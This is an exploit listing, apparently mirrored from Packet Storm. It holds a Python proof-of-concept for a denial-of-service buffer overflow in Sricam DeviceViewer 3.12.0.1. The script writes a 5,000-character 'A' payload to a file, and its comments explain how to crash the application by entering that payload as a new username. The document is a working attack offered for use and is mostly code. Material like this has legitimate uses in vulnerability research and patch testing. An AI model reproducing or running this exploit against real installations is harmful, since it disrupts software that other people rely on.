Share
## https://sploitus.com/exploit?id=PACKETSTORM:154581
#!/usr/bin/python  
  
# Exploit Title: DeviceViewer 3.12.0.1 - 'creating user' DOS buffer overflow  
# Date: 9/23/2019  
# Exploit Author: x00pwn  
# Vendor Homepage: http://www.sricam.com/  
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe  
# Version: v3.12.0.1  
# Tested on: Windows 7  
  
# Steps to reproduce:  
# 1. Generate a malicious payload via the POC  
# 2. In the Sricam application create a new user  
# 3. When creating a new user, set the username as the malicious payload  
# 4. Observe a program DOScrash  
  
payload = "A" * 5000  
  
try:  
evilCreate =open("exploit.txt","w")  
print("""  
DeviceViewer 3.12.0.1 DOS exploit POC  
Author: Nu11pwn  
""")  
print("[x] Creating malicious file")  
evilCreate.write(payload)  
evilCreate.close()  
print("[x] Malicious file create")  
print("[x] When creating a new user, set the username to the file contents")  
print("[x] Watch the program crash")  
except:  
print("[!] File failed to be created")